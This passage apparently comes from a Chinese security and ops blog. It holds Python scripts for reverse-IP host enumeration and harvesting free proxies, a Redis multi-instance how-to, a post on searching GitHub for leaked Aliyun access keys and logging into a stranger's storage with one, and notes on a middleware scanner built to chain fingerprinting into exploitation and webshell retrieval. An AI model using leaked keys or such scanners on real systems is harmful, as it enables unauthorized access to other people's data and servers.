        response = requests.get(host, headers=headers ,verify=False)
        server = response.headers['Server']
        title = re.findall(r'<title>(.*?)</title>',response.content)[0]
    except Exception,e:
        #print "%s" % str(e)
        #print host
        pass
    else:
        print host,server

def aizhan(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href="[^']+?([^']+?)/" rel="nofollow" target="_blank">\1</a>'''
    regexp_next = r'''<a href="http://dns.aizhan.com/[^/]+?/%d/">%d</a>'''
    url = 'http://dns.aizhan.com/%s/%d/'

    page = 1
    while True:
        if page > 2:
            time.sleep(1)   # throttle to avoid getting blocked
        req = requests.get(url % (host , page) ,headers=headers ,verify=False)
        try:
            html = req.content.decode('utf-8')  # decode the page
            if req.status_code == 400:
                break
        except Exception as e:
            print str(e)
            pass
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1

    return ip2hosts

def chinaz(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href='[^']+?([^']+?)' target=_blank>\1</a>'''
    regexp_next = r'''<a href="javascript:" val="%d" class="item[^"]*?">%d</a>'''
    url = 'http://s.tool.chinaz.com/same?s=%s&page=%d'

    page = 1
    while True:
        if page > 1:
            time.sleep(1)   # throttle to avoid getting blocked
        req = requests.get(url % (host , page) , headers=headers ,verify=False)
        html = req.content.decode('utf-8')  # decode the page
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1
    return ip2hosts

def same_ip(host):
    mydomains = []
    mydomains.extend(ip2host_get(host))
    mydomains.extend(links_ip(host))
    mydomains.extend(aizhan(host))
    mydomains.extend(chinaz(host))
    mydomains = list(set(mydomains))
    p = Pool()
    for host in mydomains:
        p.apply_async(filter, args=(host,))
    p.close()
    p.join()


if __name__=="__main__":
    if len(sys.argv) == 2:
        same_ip(sys.argv[1])
    else:
        print ("usage: %s host" % sys.argv[0])
        sys.exit(-1)

 

Fetching HTTP proxies with Python

Published: July 24, 2016 // Categories: work log, ops work, dev notes, linux, windows, python // 7 Comments

This mainly scrapes proxy listings from http://www.ip181.com/, http://www.kuaidaili.com/ and http://www.66ip.com/, then verifies each proxy's reliability by visiting v2ex.com and guokr.com through it.

# -*- coding=utf8 -*-
"""
    Scrape HTTPS proxies from the web
"""
import re
import sys
import time
import Queue
import logging
import requests
import threading
from pyquery import PyQuery
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()


#logging.basicConfig(
#    level=logging.DEBUG,
#    format="[%(asctime)s] %(levelname)s: %(message)s")

class Worker(threading.Thread):  # processes job requests
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except Queue.Empty:
                break


class WorkManager:  # thread pool: create and manage workers
    def __init__(self, num_of_workers=10):
        self.workQueue = Queue.Queue()  # job queue
        self.resultQueue = Queue.Queue()  # result queue
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # create a worker thread
            self.workers.append(worker)  # add it to the pool

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # take a thread from the pool
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # put it back into the pool
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # push a job onto the work queue

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)

def check_proxies(ip,port):
    """
    Check whether a proxy is alive by
    fetching v2ex.com and guokr.com through it
    """
    proxies={'http': 'http://'+str(ip)+':'+str(port)}
    try:
        r0 = requests.get('http://v2ex.com', proxies=proxies,timeout=30,verify=False)
        r1 = requests.get('http://www.guokr.com', proxies=proxies,timeout=30,verify=False)

        if r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and "09043258" in r1.content and "15015613" in r0.content:
            #r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and 
            print ip,port
            return True
        else:
            return False

    except Exception, e:
        pass
        #sys.stderr.write(str(e))
        #sys.stderr.write(str(ip)+"\t"+str(port)+"\terror\r\n")
        return False
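One caveat: the proxies dict above only maps the http scheme, and requests picks a proxy by the target URL's scheme, so https URLs would bypass the proxy entirely. A sketch covering both schemes:

# route both schemes through the proxy when probing
proxies = {
    'http':  'http://%s:%s' % (ip, port),
    'https': 'http://%s:%s' % (ip, port),
}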

def get_ip181_proxies():
    """
    Fetch HTTP proxies from http://www.ip181.com/
    """
    proxy_list = []
    try:
        html_page = requests.get('http://www.ip181.com/',timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
        jq = PyQuery(html_page)
        for tr in jq("tr"):
            element = [PyQuery(td).text() for td in PyQuery(tr)("td")]
            if 'HTTP' not in element[3]:
                continue

            result = re.search(r'\d+\.\d+', element[4], re.UNICODE)
            if result and float(result.group()) > 5:
                continue
            #print element[0],element[1]
            proxy_list.append((element[0], element[1]))
    except Exception, e:
        sys.stderr.write(str(e))
        pass

    return proxy_list

def get_kuaidaili_proxies():
    """
    Fetch HTTP proxies from http://www.kuaidaili.com/
    """
    proxy_list = []
    for m in ['inha', 'intr', 'outha', 'outtr']:
        try:
            html_page = requests.get('http://www.kuaidaili.com/free/'+m,timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    for n in range(0,11):
        try:
            html_page = requests.get('http://www.kuaidaili.com/proxylist/'+str(n)+'/',timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list

def get_66ip_proxies():
    """
    Fetch HTTP proxies from the http://www.66ip.com/ API endpoints
    """
    urllists = [
        'http://www.proxylists.net/http_highanon.txt',
        'http://www.proxylists.net/http.txt',
        'http://www.66ip.cn/nmtq.php?getnum=1000&anonymoustype=%s&proxytype=2&api=66ip',
        'http://www.66ip.cn/mo.php?sxb=&tqsl=100&port=&export=&ktip=&sxa=&submit=%CC%E1++%C8%A1'
        ]
    proxy_list = []
    for url in urllists:
        try:
            html_page = requests.get(url,timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
            patterns = re.findall(r'((?:\d{1,3}\.){1,3}\d{1,3}):([1-9]\d*)',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list


def get_proxy_sites():
    wm = WorkManager(20)
    proxysites = []
    proxysites.extend(get_ip181_proxies())
    proxysites.extend(get_kuaidaili_proxies())
    proxysites.extend(get_66ip_proxies())

    for element in proxysites:
        wm.add_job(check_proxies,str(element[0]),str(element[1]))
    wm.start()
    wm.wait_for_complete()


if __name__ == '__main__':
    try:
        get_proxy_sites()
    except Exception as exc:
        print(exc)

Running multiple Redis instances on multiple ports

Published: July 21, 2016 // Categories: ops work, linux, windows, reposts // No Comments

Run Redis on one machine with several ports enabled to get multiple instances, simulating a cluster.

  • Starting multiple instances

Redis starts on port 6379 by default; we can use --port to bring up more instances. In a Linux terminal:

redis-server &
redis-server --port 6380 &
redis-server --port 6381 &
redis-server --port 6382 &

Check the running Redis instances:

ps -ef | grep redis


  • Using an instance

Use one of the Redis instances:

[root@iZ251fha7aeZ src]# redis-cli -p 6380
127.0.0.1:6380> keys '*'
(empty list or set)
127.0.0.1:6380> set foo hello
OK
127.0.0.1:6380> keys '*'
1) "foo"
127.0.0.1:6380> set foo1 hello
OK
127.0.0.1:6380> keys '*'
1) "foo1"
2) "foo"
127.0.0.1:6380> get foo1
"hello"
127.0.0.1:6380>

That completes deploying and using multi-port, multi-instance Redis.
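From code, each instance is simply addressed by its port; a quick sketch with redis-py (assuming the redis package is installed):

import redis

r = redis.StrictRedis(host='127.0.0.1', port=6380)
r.set('foo', 'hello')
print r.get('foo')  # hello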

  • Shutting down an instance

Redis is shut down like this:

redis-cli shutdown

Or for the instance on a specific port:

redis-cli -p 6380 shutdown

New tricks for finding leaks via GitHub search

Published: June 14, 2016 // Categories: work log, ops work, code study, windows // 2 Comments

The initial lead came from http://www.wooyun.org/bugs/wooyun-2016-0218766. After seeing the ALIYUN_ACCESS_ID and ALIYUN_ACCESS_KEY leaked there, I connected straight to OSS with an OSS client. Curiosity got the better of me, so I went searching for more OSS-related leaks.

Searching GitHub directly for ALIYUN_ACCESS_ID or ALIYUN_ACCESS_KEY surfaces quite a lot:

https://github.com/search?q=ALIYUN_ACCESS_ID&ref=searchresults&type=Code&utf8=%E2%9C%93

https://github.com/search?q=ALIYUN_ACCESS_KEY&ref=searchresults&type=Code&utf8=%E2%9C%93

I tested one:

https://github.com/xukg/GeiliXinli/blob/6c7762b71514fd1a0ac52f7763f3ab18e0f778d5/app/src/main/java/com/geilizhuanjia/android/framework/utils/ConstantUtil.java

and connected successfully.

There's plenty more waiting to be dug up, e.g. Taobao's code hosting, oschina's code hosting, and so on.
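This kind of digging can also be scripted against GitHub's code-search API (a sketch; code search requires authentication, so the token below is a placeholder):

import requests

headers = {'Authorization': 'token YOUR_TOKEN_HERE'}  # placeholder token
res = requests.get('https://api.github.com/search/code',
                   params={'q': 'ALIYUN_ACCESS_KEY'}, headers=headers)
for item in res.json().get('items', []):
    print item['repository']['full_name'], item['path']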

As for client tools, I found two builds without trouble [win+mac]:

ossclient_mac.zip  ossclient_win.zip

A middleware vulnerability detection framework (F-MiddlewareScan)

Published: March 20, 2016 // Categories: dev notes, work log, linux, windows, python, everyday life // 1 Comment

A lightweight middleware vulnerability detection framework written in pure Python, automating the whole chain: port probing -> middleware fingerprinting -> vulnerability detection -> webshell retrieval.
Parameter reference:
-h required; supports a single IP (192.168.1.1), an IP block (192.168.1), or an IP range (192.168.1.1-192.168.1.254); at most 65535 IPs per scan.
-p ports to scan, comma-separated, e.g. 7001,8080,9999. If omitted, the built-in default ports are used (80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080).
-m number of threads, default 100.
-t HTTP request timeout, default 10 seconds; the port-scan timeout is half this value.

Vulnerability detection scripts exist as plugins in the plugins directory, and you can add or modify them yourself. The plugin contract is very simple: operate on the IP, port, and timeout passed in, and on success return "YES|message to print".
A new plugin must be registered in plugin_config.ini (multiple plugins for a service are comma-separated).
Middleware fingerprints are configured in discern_config.ini (matching on both body content and headers).

There are 19 vulnerability plugins built in so far; I hope everyone can write more together. Still missing are WebLogic auto-deploy and deserialization probes, plus plugins that automatically obtain a webshell via middleware deserialization, and so on.
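To illustrate the contract, a minimal plugin might look like the sketch below (the entry-point name and signature are my assumption; match the bundled plugins when writing a real one):

# plugins/example_check.py -- minimal plugin sketch
import urllib2

def check(ip, port, timeout):
    url = 'http://%s:%s/manager/html' % (ip, port)
    try:
        urllib2.urlopen(url, timeout=timeout)
    except urllib2.HTTPError as e:
        if e.code == 401:
            # success: return "YES|message to print"
            return 'YES|Tomcat manager exposed at %s' % url
    except Exception:
        pass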

Spent the weekend sick with a cold; apart from taking medicine, all I did was zone out. A friend said he wanted it modified to add CMS fingerprinting and same-server lookups, so I got to work.

def exploit(URL, Thread):
    w = cms.WhatWeb(URL, Thread)
    w.run()
    if w.result:
        return w.result

def whatcms(scan_type,task_host,task_port):
    task_port = '80'
    if task_host.find('http') == -1:
        URL = 'http://'+str(task_host)
    elif task_host.find('///') != -1 and task_host.find('~') == -1:
        URL = str(task_host.replace('///','://'))
    elif task_host.find('///') != -1 and task_host.find('~') != -1:
        URL = task_host.replace('///','://').replace('~',':').rstrip('/')
    log(scan_type,URL,task_port)
    Thread = 40
    try:
        r = requests.get(URL, timeout=15, verify=False)
        if r.status_code == 200:
            return exploit(URL, Thread)
    except Exception as e:
        #print str(e)
        return

def ip2host_get(scan_type,host,port):
    ip2hosts = []
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), timeout=45, verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item.replace('://','///').replace(':','~'))
    except Exception, e:
        print str(e)
        pass
    return ip2hosts

I also reshuffled the order of the steps:

    def run(self):
        while True:
            queue_task = self.queue.get()
            task_type,task_host,task_port = queue_task.split(":")
            if task_type == 'portscan':
                port_status = scan_port(task_type,task_host,task_port)
                if port_status == True:
                    # port is open, push the next task
                    queue.put(":".join(['ip2host_get',task_host,task_port]))
            elif task_type == 'ip2host_get':
                # reverse-IP lookup against the live IP
                result = []
                urls = ip2host_get(task_type,task_host,task_port)
                #queue.put(":".join(['discern',task_host,task_port]))
                urls.insert(0,task_host)
                result.extend(urls)
                urls = list(set(result))
                if len(urls)>0:
                    # list has no find(); iterate instead
                    for url in urls:
                        if len(url)>0:
                            #print url
                            # put each url on the queue, though threads + queue still have some issues
                            queue.put(":".join(['whatcms',str(url),task_port]))
            elif task_type == 'whatcms':
                cms = whatcms(task_type,task_host,task_port)
                queue.put(":".join(['discern',task_host,task_port]))
                if cms == None:
                    # carry on, though it's not much use;
                    # TODO: add plugin-based scanning later
                    pass

            elif task_type == 'discern':
                # middleware fingerprinting
                discern_type = scan_discern(task_type,task_host,task_port)
                if discern_type:
                    queue.put(":".join([discern_type,task_host,task_port]))
            else:
                scan_vul(task_type,task_host,task_port)
            self.queue.task_done()
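Since queue tasks are colon-delimited ("type:host:port"), URLs get their '://' and ':' masked as '///' and '~' before queueing; that's what the replace() chains above are doing. Factored out as helpers (a sketch):

def encode_url(url):
    # mask ':' so the URL survives queue_task.split(":")
    return url.replace('://', '///').replace(':', '~')

def decode_url(token):
    return token.replace('///', '://').replace('~', ':')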

But then the problem: the threads crashed constantly, and I was stuck.

Then I found something interesting: https://raw.githubusercontent.com/erevus-cn/pocscan/master/web/tasks.py

# coding:utf-8
import gevent
from gevent.pool import Pool
from web.lib.utils import *
from pocscan.poc_launcher import Poc_Launcher
from celery import Celery, platforms

app = Celery()

# allow celery to start with root privileges
platforms.C_FORCE_ROOT = True

# override celery's global configuration
app.conf.update(
    CELERY_IMPORTS = ("tasks", ),
    BROKER_URL = 'amqp://guest:guest@localhost:5672/',
    CELERY_RESULT_BACKEND = 'db+mysql://root:123456@127.0.0.1:3306/pocscan',
    CELERY_TASK_SERIALIZER='json',
    CELERY_RESULT_SERIALIZER='json',
    CELERY_TIMEZONE='Asia/Shanghai',
    CELERY_ENABLE_UTC=True,
    BROKER_TRANSPORT_OPTIONS = {'visibility_timeout': 3600}, # a task not acknowledged within the visibility timeout is redelivered to another worker; default 1 hour
    CELERYD_CONCURRENCY = 50 ,
    CELERY_TASK_RESULT_EXPIRES = 1200,  # expiry for task results; my tasks don't need to return results anyway
    # BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True},       # transport option that adds a prefix to messages
)

# failed tasks retry after a 300-second delay, max 5 retries
#@app.task(bind=True, default_retry_delay=300, max_retries=5)
@app.task(time_limit=3600)
def run_task_in_gevent(url_list, poc_file_dict):     # each call gets its own batch of urls
    poc = Poc_Launcher()
    pool = Pool(100)
    for target in url_list:
        for plugin_type,poc_files in poc_file_dict.iteritems():
            for poc_file in poc_files:
                if target and poc_file:
                    target = fix_target(target)
                    pool.add(gevent.spawn(poc.poc_verify, target, plugin_type, poc_file))
    pool.join()

A quick search shows Celery is a task queue designed precisely for distributing work across workers. Something to study later.

References:

http://docs.jinkan.org/docs/celery/
http://my.oschina.net/u/2306127/blog/417360
http://rfyiamcool.blog.51cto.com/1030776/1325062
http://www.tuicool.com/articles/qi6Nve